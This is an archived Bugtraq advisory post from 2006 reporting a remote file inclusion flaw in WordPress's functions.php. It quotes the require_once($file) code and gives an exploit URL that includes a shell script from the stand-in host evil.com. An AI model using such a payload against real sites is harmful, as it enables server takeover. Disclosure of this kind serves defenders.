Wordpress File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wordpress File Inclusion
From: vannovax@xxxxxxxxx
Date: 11 Nov 2006 02:18:35 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WordPress Remote File Inclusion
Download:http://wordpress.org/latest.zip
Found by _ANtrAX_ http://foro.c-group.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:   
{
   global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query,
       
      $wp_rewrite, $wpdb;

   
extract($wp_query->query_vars);

   
   require_once($file);
}
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/wp-includes/functions.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:V4MP1R3Z4, FRE4K , PENNISSMEN ,EL GROXO , DEYABU ROOLZ , 
MATASANOS,C-GROUP STAFF  . CHAPINHACK, SysRoot ¬¬

Follow-Ups:
- Re: Wordpress File Inclusion
  - From: Expanders

Prev by Date: [SECURITY] [DSA 1209-1] New trac packages fix cross-site request forgery
Next by Date: Mega Mall [ multiples injection sql & full path disclosure ]
Previous by thread: [SECURITY] [DSA 1209-1] New trac packages fix cross-site request forgery
Next by thread: Re: Wordpress File Inclusion
Index(es):
- Date
- Thread